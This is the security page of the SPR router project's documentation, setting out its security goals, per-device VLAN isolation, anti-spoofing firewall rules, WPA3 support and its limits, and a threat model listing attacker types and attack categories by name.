Skip to main content

Security

Contact Information

Email spr-security [at] supernetworks.org or reach out on the discord chat

Security Goals

Router is secure against compromises via the web services, remote uplink, or local network attack surfaces

Practical to use strong passwords for wifi devices

One compromised device should not be able to impersonate other devices on the network or intercept their network traffic

Devices can only communicate to systems they are explicitly allowed to. No spoofing.

Out of scope for Now

Power & Radio Sidechannel attacks

Physical attacks, physical supply chain


Key Security Features

Multi-PSK & VLANs

SPR places each WiFi device into its own VLAN. The device password and MAC address combination is used to authenticate into the DHCP assigned VLAN. The device does not need to be aware it is in a VLAN, except that DHCP has provided a /30 "tiny" network, and communications to other LAN devices should be routed over the AP.

There is no limit to the number of VLANs and a user does not have to assign devices to VLANs.

No MAC spoofing and other layer 2 network pivoting

Firewall rules enforce the MAC address for the authenticated device to block MAC spoofing. Further OS configuration blocks ARP spoofing from interfaces on a VLAN. The packet forwarding to other devices is default deny. If a device is part of the all devices LAN group, or is in a group with other devices then traffic will be allowed.

GTK are unique per VLAN so devices can't bypass the router to communicate. TDLS is disabled.

These rules are also enforced with mesh networking, supported today in SPR PLUS over wired backhaul.

Multicast Limitation

Currently the multicast proxy will relay multicast traffic to all devices. A further hardening step is to enforce routing policy for multicast traffic as well.

Upstream LAN Traffic Blocked By Default

Typically, users of SPR will plug the SPR into their existing network which will be called an upstream LAN. By default, SPR will block traffic to upstream Private LANs rfc1918 for devices, unless the lan_upstream tag is enabled. This prevents SPR devices from accessing upstream private addresses.

WPA3 Support

WPA3 uses the Simultaneous Authentication of Equals (SAE) protocol for authentication. The Key Exchange can not be sniffed and cracked as with WPA2 (PBKDF2 based) because it's a zero knowledge-proof of the password.

WPA3 Also provides for Management Frame Protection (MFP) 802.1w which is optional for WPA2 but mandatory in WPA3.

Practical Limitations of WPA3

iOS Device QR-Code WPA2 Downgrade

iOS has a long standing flaw where networks with WPA3 that are scanned with a QR Code are later saved as WPA2. As a result, SPR supports both WPA2 and WPA3 for devices.

Many devices don't support WPA3 yet, some still require WPA1 even

Since not all devices support WPA3, a bssid, SPR runs MFP with mixed mode (ieee80211w=1).

Network Visibility

SPR provides for DNS, traffic monitoring capabilities as well as authentication logs for the APIs.


Threat Actors

Remote Internet Attacker

Anyone on the internet that can send packets to the WAN/Uplink interface

Man In The Middle / Malicious ISP

An attacker with a man in the middle position on the uplink

Supply Chain Attacker

An attacker looking to insert code into the SPR project to compromise routers

Physical Proximity Attacker (Evil Neighbor)

An attacker with physical proximity to WiFi

Inside Perimeter Attacker (Evil Guest)

An attacker with physical access

Compromised Device Attacker (Implant)

An attacker operating from a compromised device, authenticated on the network

Threat Vectors

Network Flaws

Weak Passphrase / Password Reuse

ARP Spoofing

MAC Spoofing

DHCP MAC Spoofing

VLAN Hopping

Insecure Private Requests from Web Browsers

Software Implementation Flaws

Memory corruption

Command Injection

XSS, CSRF

DNS Cache Poisoning

Response Splitting Attacks

802.11 Flaws

Cryptographic Vulnerabilities

Password Cracking

Frag Attacks

MITM

AP Isolation Bypass

Packet in Packet Attacks